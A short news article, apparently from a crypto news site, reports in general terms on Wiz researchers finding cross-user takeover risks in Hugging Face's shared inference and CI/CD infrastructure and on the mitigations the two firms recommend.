Hugging Face Fixed Troubling Issues for Better Security

Hugging Face receives a huge number of AI models for testing and evaluation that are vulnerable to hackers. The artificial intelligence adaptation rate is the one that has never been seen before. This frenzy has helped in developing many beneficial tools, but at the same time, it has provided a faster and easier way to […]

Apr 8, 2024 - 16:21
 0
Hugging Face Fixed Troubling Issues for Better Security

Hugging Face receives a huge number of AI models for testing and evaluation that are vulnerable to hackers. The artificial intelligence adaptation rate is the one that has never been seen before. This frenzy has helped in developing many beneficial tools, but at the same time, it has provided a faster and easier way to the hackers to implement their malicious strategies. Speaking of Hugging Face, as hackers had a way to retrieve user information by running their own codes. 

According to researchers at cloud security firm WIZ, there were two major flaws in the system architecture where ML (machine learning) models were executed. The flaws, namely shared inference infrastructure takeover risk and shared continuous integration and continuous deployment (CI/CD) takeover risk, left users at the mercy of black-hat jacks. In simpler words, these flaws provided a secret way for hackers to upload their codes, which gave them a way to temper the registries. 

Hugging Face’s and WIZ’s partnership to explore the shortcomings

Hackers could unauthorizedly access other users’ data by uploading their own malicious AI models. This was a big problem and could make a potential dent in Hugging Face’s reputation as these platforms are extensively used for storing and processing AI models as an AI as a service platform (AlaaS). WIZ partnered with AaaS companies to find security vulnerabilities in these platforms. In the case of Hugging Face, its immense popularity and adoption brought it on the radar of hackers. WIZ’s collaboration provided a good opportunity for Hugging Face to mediate the shortcomings in its system and strengthen the platform’s security measures.

As we know, AI models require higher GPU power to run their functions, for which startups and other smaller vendors rely on AI service-provider companies. The interface API of Hugging Face also provides the very same service. In the process, WIZ Research ran its own vicious AI model with some nasty features that compromised the Hugging Face service. This made the system vulnerable, and WIZ could access other customer models who were utilizing the Hugging Face service. 

Solutions and remedies for protection on Alaas platforms

WIZ stated on its blog that these shortcoming and findings are not plaguing Hugging Face only, rather, they have broader implications for the entire AI as a service industry. All players in the industry are at the risk of magnitute, as hackers see them as a GitHub of AI models and seek to get cross-user access illegally. 

Hugging Face and Wiz jointly suggested some precautions to prevent security breaches, they advised stringent security controls and regular monitoring of activities. They also suggested using secure registries and providing a sandboxed environment for running user applications by making the places where they store their codes more fenced to prevent cross-user access.

Research info at WIZ

What's Your Reaction?

like

dislike

love

funny

angry

sad

wow

CryptoFortress Disclosure: This article does not represent investment advice. The content and materials featured on this page are for educational purposes only.